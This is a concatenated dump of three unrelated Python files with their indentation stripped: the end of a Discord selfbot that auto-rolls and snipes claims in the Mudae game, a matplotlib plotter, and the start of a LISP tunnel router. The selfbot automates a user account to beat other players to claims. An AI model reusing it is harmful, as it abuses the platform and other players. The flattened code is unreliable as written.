settings['claim_snipe'][0] = int(settings['claim_snipe'][0])
settings['kak_snipe'][0] = int(settings['kak_snipe'][0])
settings['pending'] = None
settings['rolls'] = 0
return settings
def get_snipe_time(channel,rolled,message):
# Returns delay for when you are able to snipe a given roll
r,d = channel_settings[channel]['claim_snipe']
if r == 0:
# Anarchy FTW!
return 0.0
global user
is_roller = (rolled == user['id'])
if (r < 4 or r == 5) and is_roller:
# Roller can insta-snipe
return 0.0
if r == 2 and not is_roller:
# Not the roller.
return d
wished_for = mention_finder.findall(message)
# Wish-based rules
if not len(wished_for):
# Not a WISHED character
if r > 4:
# Combined restriction, roller still gets first dibs
return 0.0 if is_roller else d
return 0.0
if r > 2 and user['id'] in wished_for:
# Wishers can insta-snipe
return 0.0
if r == 1 and rolled not in wished_for:
# Roller (who is not us) did not wish for char, so can insta-snipe
return 0.0
return d
def next_claim(channel):
channel = int(channel)
offset = (120-(channel_settings[channel]['shift']+channel_settings[channel]['reset_min']))*60
reset_period = channel_settings[channel]['claim_reset']*60
t = time.time()+offset
last_reset = (t%86400)%reset_period
reset_at = reset_period-last_reset+time.time()
return (int(t/reset_period),reset_at) # claim window id, timestamp of reset
def next_reset(channel):
# Returns timestamp of next reset
channel = int(channel)
offset = channel_settings[channel]['reset_min']*60
t = time.time()
return t+(3600-((t-offset)%3600))
def poke_roll(tide):
logger.debug(f"Pokemon Rolling Started in channel {tide}. (If you would like this in a different channel, please configure the desired channel ID as the first in your list)")
tides = str(tide)
if tide not in channel_settings:
logger.error(f"Could not find channel {tide}, will not roll poke")
return
c_settings = channel_settings[tide]
pwait = 0
while True:
while pwait == 0:
time.sleep(2)
bot.sendMessage(tides,c_settings['prefix']+"p")
pwait = 2*60*60 # sleep for 2 hours
print(f"{pwait} : pokerolling : {tide}")
time.sleep(pwait)
pwait = 0
def waifu_roll(tide):
global user
logger.debug(f"waifu rolling Started in channel {tide}")
tides = str(tide)
waifuwait = 0
if tide not in channel_settings:
logger.error(f"Could not find channel {tide}, skipping waifu roll on this channel.")
return
c_settings = channel_settings[tide]
roll_cmd = c_settings['prefix'] + roll_prefix
warned_overroll = False
while True:
c_settings['rolls'] = 0
rolls_left = -1
while waifuwait == False:
bot.sendMessage(tides,roll_cmd)
rolls_left = rolls_left-1
varwait = wait_for(bot,mudae_warning(tides,False),timeout=5)
time.sleep(.5)
if varwait != None and varwait['content'].startswith(f"**{bot.gateway.session.user['username']}") and "$ku" not in varwait['content']:
# We over-rolled.
waifuwait = True
if c_settings['rolls'] > 2 and not warned_overroll:
# We overrolled when we shouldn't have. Warn the user they can prevent this
warned_overroll = True
logger.warning("Please enable $rollsleft 0 feature to prevent overrolling")
break
elif varwait != None and rolls_left < 0:
# Check if our roll featured a warning
total_text = varwait.get('content','') # $rollsleft 2
if len(varwait['embeds']):
total_text += varwait['embeds'][0].get('footer',{}).get('text','') # $rollsleft 0 (default)
total_text += varwait['embeds'][0].get('description','') # $rollsleft 1
# Check if it's our roll
our_roll = msg_buf.get(varwait['id'],{}).get('rolled',None)
p = c_settings['pending']
if our_roll == None and p:
# on_message may have not seen our roll, so we should manually check if it was our roll
our_roll = p == bot.gateway.session.user['id']
if our_roll and "\u26a0\ufe0f 2 ROLLS " in total_text:
# Has warning for us
rolls_left = 2
if rolls_left == 0:
# Ran out of rolls
waifuwait = True
print(f"{waifuwait}: Waifu rolling : {tide}")
time.sleep((next_reset(tide)-time.time())+1)
waifuwait = False
def snipe(recv_time,snipe_delay):
if snipe_delay != 0.0:
try:
time.sleep((recv_time+snipe_delay)-time.time())
except ValueError:
# sleep was negative, so we're overdue!
return
time.sleep(.5)
def is_rolled_char(m):
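    """Heuristic check that a Mudae message is a freshly rolled character:
    exactly one embed with an image and an author holding only a name, and no
    pagination footer (e.g. '1 / 29')."""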
embeds = m.get('embeds',[])
if len(embeds) != 1 or "image" not in embeds[0] or "author" not in embeds[0] or list(embeds[0]["author"].keys()) != ['name']:
# not a marry roll.
return False
elif 'footer' in embeds[0] and 'text' in embeds[0]['footer'] and pagination_finder.findall(embeds[0]['footer']['text']):
# Has pagination e.g. "1 / 29", which does not occur when rolling
return False
return True
@bot.gateway.command
def on_message(resp):
global user
recv = time.time()
if resp.event.message:
m = resp.parsed.auto()
#print(m)
aId = m['author']['id']
content = m['content']
embeds = m['embeds']
messageid = m['id']
channelid = m['channel_id']
guildid = m['guild_id'] if 'guild_id' in m else None
if int(channelid) not in mhids:
# Not a channel we work in.
return
if int(channelid) not in channel_settings:
mhids.remove(int(channelid))
logger.error(f"Could not find settings for {channelid}, please trigger the '$settings' command in the server and run the bot again.")
return
c_settings = channel_settings[int(channelid)]
if c_settings['pending'] == None and int(aId) != mudae and content[0:c_settings['prefix_len']] == c_settings['prefix'] and content.split(' ')[0][c_settings['prefix_len']:] in mudae_cmds:
# Note rolls as they happen so we know who rolled what
c_settings['pending'] = aId
return
elif int(aId) == mudae:
if "interaction" in m:
# Mudae triggered via slash command
roller = m['interaction']['user']['id']
else:
roller = c_settings['pending']
c_settings['pending'] = None
# Validate this is a rolled character.
if not is_rolled_char(m):
# Might be claim timer
if m['content'].startswith('<@' + user['id'] + '>') or m['content'].startswith('<@!' + user['id'] + '>'):
# get claim time
if get_pwait(m['content']):
waifu_wall[channelid] = next_claim(channelid)[0]
return
msg_buf[messageid] = {'claimed':int(embeds[0].get('color',0)) not in (16751916,1360437),'rolled':roller == user['id']}
print(f"Our user rolled in {channelid}" if roller == user['id'] else f"Someone else rolled in {channelid}")
if msg_buf[messageid]['claimed']:
return
if(not sniping and roller != user['id']):
# Sniping disabled by user
return
if roller == user['id']:
# confirmed user roll
c_settings['rolls'] += 1
if waifu_wall.get(channelid,0) != next_claim(channelid)[0]:
snipe_delay = get_snipe_time(int(channelid),roller,content)
charpop = m['embeds'][0]
charname = charpop["author"]["name"]
chardes = charpop["description"]
charcolor = int(charpop['color'])
if str(user['id']) in content:
logger.info(f"Wished {charname} from {get_serial(chardes)} with {get_kak(chardes)} Value in Server id:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
if charname.lower() in chars:
logger.info(f"{charname} appeared attempting to Snipe Server id:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
for ser in series_list:
if ser in chardes and charcolor == 16751916:
logger.info(f"{charname} from {ser} appeared attempting to snipe in {guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
break
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
break
else:
bot.addReaction(channelid, messageid, "❤")
break
if "<:kakera:469835869059153940>" in chardes or "Claims:" in chardes or "Likes:" in chardes:
#det_time = time.time()
kak_value = get_kak(chardes)
if int(kak_value) >= kak_min and charcolor == 16751916:
logger.info(f"{charname} with a {kak_value} Kakera Value appeared Server:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
#print(f"took this much {time.time() - det_time}")
if str(user['id']) not in content and charname.lower() not in chars and get_serial(chardes) not in series_list and int(get_kak(chardes)) < kak_min:
logger.debug(f"Ignoring {charname} from {get_serial(chardes)} with {get_kak(chardes)} Kakera Value in Server id:{guildid}")
if resp.event.message_updated:
# Handle claims
r = resp.parsed.auto()
rchannelid = r["channel_id"]
rmessageid = r["id"]
embeds = r['embeds']
if int(rchannelid) not in mhids:
return
try:
if r['author']['id'] == str(mudae):
if not is_rolled_char(r):
return
embed = embeds[0]
f = embed.get('footer')
if f and bot.gateway.session.user['username'] in f['text']:
# Successful claim, mark waifu claim window as used
waifu_wall[rchannelid] = next_claim(rchannelid)[0]
elif int(embed['color']) == 6753288:
# Someone else has just claimed this, mark as such
msg_buf[rmessageid]['claimed'] = True
except KeyError:
pass
if resp.event.reaction_added:
r = resp.parsed.auto()
#print(r)
reactionid = int(r['user_id'])
rchannelid = r["channel_id"]
rmessageid = r["message_id"]
rguildid = r["guild_id"]
emoji = r["emoji"]["name"]
emojiid = r["emoji"]['id']
if int(rchannelid) not in mhids:
# Not a channel we work in.
return
if int(rchannelid) not in channel_settings:
mhids.remove(int(rchannelid))
logger.error(f"Could not find settings for {rchannelid}, please trigger the '$settings' command in the server and run the bot again.")
return
snipe_delay = channel_settings[int(rchannelid)]['kak_snipe'][1]
if reactionid == mudae and int(rchannelid) in mhids:
if emojiid != None and emoji == "kakeraP" and (snipe_delay == 0 or msg_buf[rmessageid]['rolled']):
sendEmoji = emoji + ":" +emojiid
react_m = bot.getMessage(rchannelid, rmessageid).json()[0]['embeds'][0]
time.sleep(1)
bot.addReaction(rchannelid,rmessageid,sendEmoji)
if emojiid != None and emoji.lower() in KakeraVari:
sendEmoji = emoji + ":" +emojiid
react_m = bot.getMessage(rchannelid, rmessageid).json()[0]['embeds'][0]
cooldown = kakera_wall.get(rguildid,0) - time.time()
if cooldown <= 1:
logger.info(f"{emoji} was detected on {react_m['author']['name']}:{get_serial(react_m['description'])} in Server: {rguildid}")
time.sleep(snipe_delay)
bot.addReaction(rchannelid,rmessageid,sendEmoji)
else:
logger.info(f"Skipped {emoji} found on {react_m['author']['name']}:{get_serial(react_m['description'])} in Server: {rguildid}")
return
warn_check = mudae_warning(rchannelid)
kakerawallwait = wait_for(bot,lambda r: warn_check(r) and 'kakera' in r.parsed.auto()['content'],timeout=5)
if kakerawallwait != None:
time_to_wait = waitk_finder.findall(kakerawallwait['content'])
else:
time_to_wait = []
if len(time_to_wait):
timegetter = (int(time_to_wait[0][0] or "0")*60+int(time_to_wait[0][1] or "0"))*60
print(f"{timegetter} for kakera_wall was set for Server : {rguildid}")
kakera_wall[rguildid] = timegetter + time.time()
if emojiid == None:
if emoji in eventlist:
print(f"{emoji} was detected in Server: {rguildid}")
time.sleep(snipe_delay)
bot.addReaction(rchannelid,rmessageid,emoji)
global ready
if resp.event.ready_supplemental and not ready:
ready = bot.gateway.READY
user = bot.gateway.session.user
guilds = bot.gateway.session.settings_ready['guilds']
chs = set(str(mhid) for mhid in mhids)
for gid, guild in guilds.items():
for matched_channel in (set(guild['channels'].keys()) & chs):
# Find associated guild ID to a monitored channel, then get settings
msg = get_server_settings(gid,matched_channel)
c_settings = parse_settings_message(msg)
channel_settings[int(matched_channel)] = c_settings
if settings['pkmrolling'].lower().strip() == "true":
p = threading.Thread(target=poke_roll,args=[mhids[0]])
p.start()
if settings['rolling'].lower().strip() == "true":
for chid in mhids:
waifus = threading.Timer(10.0,waifu_roll,args=[chid])
waifus.start()
def empty(*args,**kwargs):
return
#bot.sendMessage = empty
bot.gateway.run(auto_reconnect=True)
|
dataplotter.py
|
"""Run this script to display the data output during a run."""
import pickle
import threading
import matplotlib.pyplot as plt
import numpy as np
def run(filename):
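    """Load pickled plot data from filename, open one figure per named series
    (log-scaled when the name contains '(log)'), then re-read the file every
    10 seconds and redraw each line in place."""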
with open(filename, "rb") as f:
plots = pickle.load(f)
axes = []
lines = []
for p in plots:
plt.figure()
plt.title(p)
if "(log)" in p:
plt.yscale("log")
axes += [plt.gca()]
lines += [plt.plot(plots[p])[0]]
while True:
with open(filename, "rb") as f:
plots = pickle.load(f)
for i, p in enumerate(plots):
lines[i].set_data(np.arange(len(plots[p])), plots[p])
axes[i].relim()
axes[i].autoscale_view()
plt.draw()
plt.pause(10)
def run_thread(filename):
p = threading.Thread(target=run, args=(filename,))
p.daemon = True
p.start()
if __name__ == "__main__":
run("HF_plots.pkl")
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsulating Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-rtr process.
#
lisp_send_sockets = [None, None, None]
lisp_trace_listen_socket = None
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_threads = []
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
lisp_threads))
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads,
True))
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("RTR"))
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_glean_mapping_command
#
# Add a configured glean_mapping to the lisp_glean_mapping array.
#
def lisp_rtr_glean_mapping_command(kv_pair):
entry = { "rloc-probe" : False }
for kw in kv_pair.keys():
value = kv_pair[kw]
if (kw == "instance-id"):
v = value.split("-")
entry["instance-id"] = [0, 0]
if (len(v) == 1):
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[0])
else:
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[1])
#endif
#endif
if (kw == "eid-prefix"):
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_prefix(value)
entry["eid-prefix"] = eid
#endif
if (kw == "rloc-prefix"):
rloc = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
rloc.store_prefix(value)
entry["rloc-prefix"] = rloc
#endif
if (kw == "rloc-probe"):
entry["rloc-probe"] = (value == "yes")
#endif
#endfor
#
# Check if entry already exists. If so, just return.
#
for e in lisp.lisp_glean_mappings:
if (e.has_key("eid-prefix") ^ entry.has_key("eid-prefix")): continue
if (e.has_key("eid-prefix") and entry.has_key("eid-prefix")):
old = e["eid-prefix"]
new = entry["eid-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("rloc-prefix") ^ entry.has_key("rloc-prefix")): continue
if (e.has_key("rloc-prefix") and entry.has_key("rloc-prefix")):
old = e["rloc-prefix"]
new = entry["rloc-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("instance-id") ^ entry.has_key("instance-id")): continue
if (e.has_key("instance-id") and entry.has_key("instance-id")):
old = e["instance-id"]
new = entry["instance-id"]
if (old != new): continue
#endif
#
# Found a match. Do not append existing entry to array.
#
return
#endfor
#
# Add dictionary array to array.
#
lisp.lisp_glean_mappings.append(entry)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR"))
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
lisp_sockets, rloc, port, hostname = parms
addr = "{}:{}".format(rloc.print_address_no_iid(), port)
eid = lisp.green(mc.print_eid_tuple(), False)
msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
format(hostname, lisp.red(addr, False), eid, "{}", "{}")
for rloc_entry in mc.rloc_set:
if (rloc_entry.rle):
for rle_node in rloc_entry.rle.rle_nodes:
if (rle_node.rloc_name != hostname): continue
rle_node.store_translated_rloc(rloc, port)
old_addr = rle_node.address.print_address_no_iid() + ":" + \
str(rle_node.translated_port)
lisp.lprint(msg.format("RLE", old_addr))
#endfor
#endif
if (rloc_entry.rloc_name != hostname): continue
#
# Update lisp-crypto encap array. Put keys in new dictionary array
# location since translated address and port changed. We don't want
# to rekey because of a NAT change.
#
old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
str(rloc_entry.translated_port)
if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
#endif
#
# Update translated information with new information.
#
rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
rloc_entry.store_translated_rloc(rloc, port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
lisp.lprint(msg.format("RLOC", old_addr))
#
# Trigger RLOC-probe if enabled.
#
if (lisp.lisp_rloc_probing):
seid = None if (mc.group.is_null()) else mc.eid
deid = mc.eid if (mc.group.is_null()) else mc.group
lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
#endif
#endfor
#
# Write change to external data-plane.
#
lisp.lisp_write_ipc_map_cache(True, mc)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))
if (mc.source_cache == None): return(True, parms)
#
# There is (source, group) state so walk all sources for this group
# entry.
#
mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk,
[sockets, rloc, port, hostname])
return
#enddef
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulate it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_trace_listen_socket
packet = lisp_packet
is_lisp_packet = packet.is_lisp_packet(packet.packet)
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
if (is_lisp_packet == False):
orig_packet = packet.packet
pkt, source, port, ttl = lisp.lisp_is_rloc_probe(orig_packet, -1)
if (orig_packet != pkt):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
return
#endif
#endif
#
# First check if we are assembling IPv4 fragments.
#
packet.packet = lisp.lisp_reassemble(packet.packet)
if (packet.packet == None): return
#
    # We need to cache the input encapsulated packet as well as the output
# encapsulated packet.
#
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#
# If we are a PITR as well, we are receiving non encapsulated packets
# via return packets from doing LISP-NAT. Print some useful header fields
# and strip outer headers. Strip outer headers if LISP encapsulated packet
# and start inner header forwarding logic.
#
if (is_lisp_packet):
if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return
packet.print_packet("Receive-({})".format(thread_name), True)
packet.strip_outer_headers()
else:
if (packet.decode(False, None, None) == None): return
packet.print_packet("Receive-({})".format(thread_name), False)
#endif
#
    # If instance-id is 0xffffff, this is an Info-Request packet encapsulated
# to port 4341. We need to store the source port and source RLOC for
# NAT-traversal reasons.
#
# We don't need to send an Info-Reply from the 4341 data port. There is no
# information the xTR needs. It has the translated address from the
# map-server, and the NAT is ready for packets from port 4341 since we
# received this Info-Request.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
header = lisp.lisp_control_header()
header.decode(packet.packet)
if (header.is_info_request()):
info = lisp.lisp_info()
info.decode(packet.packet)
info.print_info()
#
# Store/refresh NAT state and Fix map-cache entries if there was
# a change.
#
h = info.hostname if (info.hostname != None) else ""
s = packet.outer_source
p = packet.udp_sport
if (lisp.lisp_store_nat_info(h, s, p)):
lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
#endif
else:
source = packet.outer_source.print_address_no_iid()
ttl = packet.outer_ttl
packet = packet.packet
if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
packet = packet[28::]
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
#endif
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
if (is_lisp_packet):
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#endif
#
# Process inner header (checksum and decrement ttl).
#
if (packet.inner_dest.is_mac()):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
elif (packet.inner_version == 4):
packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Process decap node trace function.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
packet.outer_source.afi = lisp.LISP_AFI_NONE
packet.outer_dest.afi = lisp.LISP_AFI_NONE
#endif
#
# Should we glean source information from packet and add it to the
# map-cache??
#
allow, nil = lisp.lisp_allow_gleaning(packet.inner_source,
packet.outer_source)
if (allow):
lisp.lisp_glean_map_cache(packet.inner_source, packet.outer_source,
packet.udp_sport)
#endif
gleaned_dest, nil = lisp.lisp_allow_gleaning(packet.inner_dest, None)
packet.gleaned_dest = gleaned_dest
#
# Do map-cache lookup. If no entry found, send Map-Request.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
#
# Map-cache lookup miss. Do not send Map-Request to mapping system if
# dest-EID is configured to be gleaned. We want to give preference to
# the gleaned mapping and not the mapping in the mapping system.
#
if (mc == None and gleaned_dest):
lisp.lprint("Suppress Map-Request for gleaned EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
#
# Check if we are doing secondary-instance-ids only when we have a
# map-cache entry in the IID that is possibly a non-LISP site.
#
if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
mc.eid.address == 0)):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db and db.secondary_iid):
dest_eid = packet.inner_dest
dest_eid.instance_id = db.secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
#endif
#endif
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_source,
packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "map-cache miss"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed() and
gleaned_dest == False):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#
    # Update stats for this entry. Per-RLOC stats are updated in lisp_mapping.select_
# rloc().
#
mc.stats.increment(len(packet.packet))
#
# Encapsulate or native forward packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, None)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "not an EID"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()):
s = lisp_trace_listen_socket
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
if (dest_rloc and dest_rloc.is_null()):
lisp.dprint("Drop action RLOC found")
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "drop action"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
    # Set up the outer header for either unicast or multicast transmission.
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.encap_port = dest_port
if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry,
lisp_socket=s) == False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
        # Do replication if an RLE is returned.
#
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
packet.outer_dest.copy_address(node.address)
packet.encap_port = lisp.LISP_DATA_PORT if \
node.translated_port == 0 else node.translated_port
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "replicate"
if (lisp.lisp_trace_append(packet, reason=r, lisp_socket=s) \
== False): return
#endif
if (packet.encode(None) == None): return
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
lisp.lisp_set_exception()
while (True):
#
# Dequeue packet from pcap's enqueue.
#
packet = lisp_thread.input_queue.get()
#
# Count input packets and bytes.
#
lisp_thread.input_stats.increment(len(packet))
#
# Use pre-defined packet data structure, store packet buffer in it.
#
lisp_thread.lisp_packet.packet = packet
#
# Decap and encap, go, go, go.
#
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endwhile
return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process packet. Do a modulus on the timestamp
# to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
seed = (time.time() % thread.number_of_pcap_threads)
return(int(seed) == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
